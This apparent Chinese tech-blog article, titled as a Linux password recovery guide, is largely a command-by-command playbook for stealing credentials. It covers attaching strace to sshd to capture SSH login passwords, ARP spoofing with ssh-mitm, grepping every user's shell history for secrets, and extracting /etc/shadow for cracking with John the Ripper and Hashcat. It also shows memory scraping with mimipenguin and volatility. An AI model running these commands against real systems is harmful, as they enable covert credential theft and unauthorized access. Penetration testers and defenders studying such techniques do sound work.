百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术文章 > 正文

Linux密码明文密码获取及破解_linux忘记密码如何破解

cac55 2025-09-08 13:24 8 浏览 0 评论

1.1sshd 进程监听(实时捕获 SSH 登录明文密码)

SH 登录时,sshd进程会通过read系统调用读取客户端发送的密码(明文传输阶段,后续会被加密验证,但read调用时仍可捕获明文)。strace通过跟踪sshd的系统调用,可抓取这一过程的明文密码。

1.strace获取

strace -f -F -p $(ps aux|grep "sshd -D"|grep -v grep|awk '{print $2}') -t -e trace=read,write -s 1024 2> sshd.log &

说明:

  • -f/-F:跟踪子进程(sshd会为每个连接创建子进程);
  • -s 1024:默认输出字符串长度 32,若密码过长可能截断,建议改为-s 1024;
  • 必须以root权限执行(普通用户无权限跟踪sshd进程)
  • 当有 SSH 登录时,sshd.log中会出现类似日志:10:01:23 read(6, "user1\0password123\0", 1024) = 16,其中password123即为明文密码(\0是分隔符)。

2.strace 监控 sshd 进程

ps aux | grep "sshd:"

# 监控密码读取

strace -f -p <PID> -e trace=read -s 1000 2>&1 | grep "password"

3.中间人攻击(MITM)

工具:ssh-mitm

(1)执行 ARP 欺骗

arpspoof -i eth0 -t 192.168.1.100 192.168.1.1 # 欺骗客户端

(2)重定向流量至 ssh-mitm

ssh-mitm -p 2222 # 监听 2222 端口

(3)抓取密码

tcpdump -i lo port 2222 -A | grep "password"

1.2 history 命令(获取潜在密码痕迹)

history记录用户执行过的命令,若用户在命令行中直接输入密码(如脚本中使用mysql -u root -ppassword、sshpass -p password等),可能留下明文。

1.涉及指定密码明文场景

用户在脚本或命令中明文指定密码,例如:

echo "newpass" | passwd --stdin user1(history中会留下newpass);

mysql -u root -p"dbpass123"(history中可能包含dbpass123)。

2.获取方式

查看所有用户的 history(需 root 权限):

cat /home/*/.bash_history /root/.bash_history | grep -iE "pass|pwd|密码"

恢复被清空的 history:若用户执行history -c,可尝试读取内存中的历史(strings /proc/$/mem | grep -i pass,成功率低)。

1.3 /etc/shadow 文件(哈希破解)

/etc/shadow存储用户密码的哈希(格式:用户名:$id$salt$hash),$id表示加密算法,可通过工具破解哈希得到明文。

1.哈希格式与算法对应

$id 值

加密算法

破解难度

1

MD5(已淘汰,易破解)

8 位纯数字:秒级破解

5

SHA-256

10 位混合:小时级(GPU)

6

SHA-512(主流)

12 位混合:天级(GPU)

y

yescrypt(新系统,如 Debian 11+)

更高,需专用工具

2.John the Ripper破解

(1)下载及安装

wget https://www.openwall.com/john/k/john-1.9.0.tar.gz

tar -zxvf john-1.9.0.tar.gz

cd john-1.9.0/src

apt install gcc # Debian/Ubuntu系统 # 或 yum install gcc # CentOS/RHEL系统

make clean # 清理之前的编译缓存

make linux-x86-64 # 编译64位版本

cd ../run # 进入运行目录

./john --version # 若显示版本信息,说明编译成功

(2)提取哈希

grep "root" /etc/shadow > root.hash(仅 root 可读取/etc/shadow);

(3)指定字典破解

./john --wordlist=
/usr/share/wordlists/rockyou.txt root.hash(rockyou.txt是常用密码字典);

(4) 增量模式(无字典时)

./john --incremental root.hash(暴力破解,适合短密码)。

3.Hashcat破解Linux密码

可以通过hashcat针对不同的加密算法来进行破解。

$id

加密算法

Hashcat 模式(-m)

1

MD5-Crypt

500

5

SHA-256-Crypt

7400

6

SHA-512-Crypt

1800

y

yescrypt

15900

2a

Blowfish-Crypt

3200

1. 破解 MD5-Crypt 哈希($1开头)

# 模式:-m 500,字典模式(-a 0)

hashcat -m 500 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

# 示例输出(成功时):

# $1$abc123$xyz789...:password123

2. 破解 SHA-256-Crypt 哈希($5开头)

# 模式:-m 7400,字典模式

hashcat -m 7400 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

# 若字典破解失败,尝试掩码暴力破解(如8位数字密码):

hashcat -m 7400 -a 3 hash.txt ?d?d?d?d?d?d?d?d

3. 破解 SHA-512-Crypt 哈希($6开头)

# 模式:-m 1800(最常用),字典模式

hashcat -m 1800 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

# 进阶:结合规则生成变体密码(如在字典密码后加年份)

hashcat -m 1800 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

4. 破解 yescrypt 哈希($y开头)

# 模式:-m 15900(需Hashcat 6.1.0+版本支持)

hashcat -m 15900 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

# 注意:yescrypt算法较新,破解难度高,建议优先使用大字典

5. 破解 Blowfish-Crypt 哈希($2a开头)

# 模式:-m 3200

hashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

参数说明:

  • a 0:字典模式(使用指定字典文件)
  • -a 3:掩码暴力破解(适合已知密码长度和字符类型,如?d表示数字,?u表示大写字母)
  • -r <规则文件>:应用密码变异规则(如大小写转换、加后缀,规则文件在 /usr/share/hashcat/rules/)
  • --show:显示已破解的哈希和明文(破解后使用)

6.实用命令示例

暂停后恢复破解:hashcat -m 1800 -a 0 hash.txt rockyou.txt --restore

仅显示已破解结果:hashcat -m 1800 hash.txt --show

1.4内存明文密码抓取

Linux 进程(如sshd、gnome-keyring、mysql)在运行时可能将密码加载到内存(如验证阶段暂存明文),通过读取进程内存可提取明文。

1.mimipenguin 工具

原理:扫描/proc/[pid]/mem(进程内存),匹配密码特征字符串(如sshd: password、mysql: auth);

支持系统:除 Kali/Ubuntu 外,CentOS 7/8、Debian 9 + 也可运行(需 Python 2.7+);

(1)安装

git clone https://github.com/huntergregal/mimipenguin.git && cd mimipenguin && ./mimipenguin.sh

输出示例:[+] Found password in sshd (PID 1234): user2:pass2024。

2.其他工具与场景

volatility(内存镜像分析),若获取内存镜像(dd if=/dev/mem of=mem.img),可提取历史密码:

vol.py -f mem.img --profile=LinuxUbuntu2004x64 linux_passwd

相关推荐

高中生又来卷我们了!手搓 Android 浏览器,可高度定制+脚本支持

回想一下,你曾经的暑假,是怎么度过的?可能是无尽的娱乐时光,或者是懒洋洋的休息日。然而,对于这位Gitee上的高中生来说,他选择在这个暑假里独立开发一款Android浏览器——Vie浏览器,...

网页加载CAD图纸的两个方案对比说明(网页浏览编辑DWG)

一.说明梦想控件提供两种技术在网页中加载CAD图纸,一个是OCX技术方案,另一个是HTML5技术方案,它们各有优缺点,用户需根据实际情况进行选择,下边分别说明一下。1、ocx技术方案(1)OCX技术是...

前后端分离的开源在线考试系统调试实战

开篇在我们的教育生涯中,或多或少的都接触过在线考试系统。例如大学里最常见的各种软件考试,上机考试等,那么有没有开源的这样的系统呢?当然是有了,今天就来调试个开源的在线考试系统。本文重点是调试,因为很多...

网友:小松鼠长大了!UC浏览器推出18周年专版logo引热议

近日,互联网厂商logo更新再次引发热议。作为国内手机浏览器的代表性厂商,UC浏览器的标志性logo小松鼠悄然发生了变化,在网友中引发了关注和讨论。依照UC微博官方账号的说法,这个全新的形象是UC18...

超多案例!谷歌AI模型Nano Banana的5个实用+趣味玩法

再不用这个AI修图神器,你的同行明天就把订单抢光了。谷歌刚放出的NanoBanana,能在一张照片里把背景、姿势、衣服一次换完,脸还是那张脸。实测把地铁照改成海边大片,只用一句话,三秒出图,不用PS来...

2025年最佳Windows数据恢复软件解决方案前5名

您是否正在寻找互联网上排名前五的WindowsPC最佳数据恢复软件解决方案?其实,网上有很多工具可以恢复已删除的文件。但并非所有应用程序都值得使用。值得信赖的文件恢复工具可以帮助您快速检索丢失、删...

电脑数据恢复软件推荐:10个顶级数据恢复软件分享

在数字化的工作与生活中,电脑文件误删除的情况时有发生,这不仅会引发我们的焦虑情绪,更可能导致重要数据的丢失。不过,幸运的是,借助正确的数据恢复软件,我们仍有机会找回那些被误删的文件。10个顶级数据恢复...

更懂国内APP的开源智能体!感知定位推理中文能力全面提升

更懂国内APP的开源智能体!感知定位推理中文能力全面提升“帮我点外卖,别点到广告位。”一句话,说出了多少人对手机自动化的真实期待。浙大和美团刚扔出来的开源项目UItron,就是冲着这句吐槽来的——它真...

美光首家推出采用EUV技术的1γ DDR5 DRAM芯片

美光科技宣布已开始向部分生态系统合作伙伴和客户出货1γ(1-gamma)16GbitDDR5DRAM芯片。美光声称,它是第一个采用1-gamma(1γ)节点的公司,该节点指的是DRAM工艺技术的第...

DDR4的PCB设计及仿真_ddr pcb

以下文章来源于鼎阳硬件智库,作者王彦武DDR4关键技术和方法分析1.1DDR4与DDR3不同之处相对于DDR3,DDR4首先在外表上就有一些变化,比如DDR4将内存下部设计为中间稍微突出,边缘变...

DDR4和DDR5内存的性能差距有哪些?

DDR4和DDR5内存的性能差距主要体现在带宽、延迟、能效及未来扩展性上,以下是关键差异的总结及选择建议:1.带宽与频率DDR4:主流频率为2133MHz–3600MHz,带宽约25.6–30.2...

DDR5内存一根和两根的区别,建议收藏观看。

大家好,我是海韵,DDR5内存条,单条和双条有什么区别,如何选择,DDR5单条和双条内存在性能上存在差距,单条内存保持在64个通道,但内部升级为32乘以2,虽然出口速度相同,但内部运行略有提升,...

Kingston FURY叛逆者DDR5 RGB CUDIMM内存评测 强势突破9000MT/s!

【ZOL中关村在线原创评测】当8000MT/s从当年的液氮超频艰难达成,到如今XMP轻松开启,DDR5内存频率的极限探索似乎看不到终点。在早先,我们曾为大家带来KingstonFURY品牌的叛逆者D...

SK海力士将在年内推出1bnm 32Gb DDR5内存颗粒

IT之家4月25日消息,据韩媒NEWSIS报道,SK海力士在今日的2024年一季度财报电话会议上表示将在年内推出1bnm32GbDDR5内存颗粒。32Gb颗粒意味着消费级的...

DRAM史上最大代际倒挂继续:三星将延长DDR4生产期限至2026年

IT之家8月6日消息,韩媒TheElec今天(8月6日)发布博文,报道称三星决定延长DDR41zDRAM的生产期限至2026年,一方面在DRAM史上最大代际倒挂中进...

取消回复欢迎 发表评论: